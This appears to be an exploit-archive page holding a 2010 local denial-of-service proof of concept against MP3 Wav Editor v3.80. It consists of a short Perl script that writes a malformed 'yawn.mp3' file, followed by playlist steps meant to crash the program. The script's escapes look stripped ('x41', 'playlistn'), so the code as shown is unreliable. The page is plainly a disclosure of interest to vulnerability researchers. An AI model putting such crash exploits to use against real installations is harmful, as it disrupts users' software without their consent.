[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MP3 Wav Editor v3.80 .mp3 Local DoS
# Published : 2010-04-05
# Author : chap0
# Previous Title : MyVideoConverter v2.15 Local DoS
# Next Title : Portable AVS DVD Authoring v1.3.3.51 Local Crash PoC


# Exploit Title: MP3WavEditor Local DoS .mp3
# Date: April 5, 2010
# Software Link: [http://www.mp3waveditor.com/index.htm]
# Version: 3.80
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
#
#
#!/usr/bin/perl

my $file = "yawn.mp3";
my $_a = "x41";

open (FILE, ">$file");
print FILE "$_a";

print "Usage: Make playlist -> Add mp3 -> Delete Playlist -> Recreate same playlistn";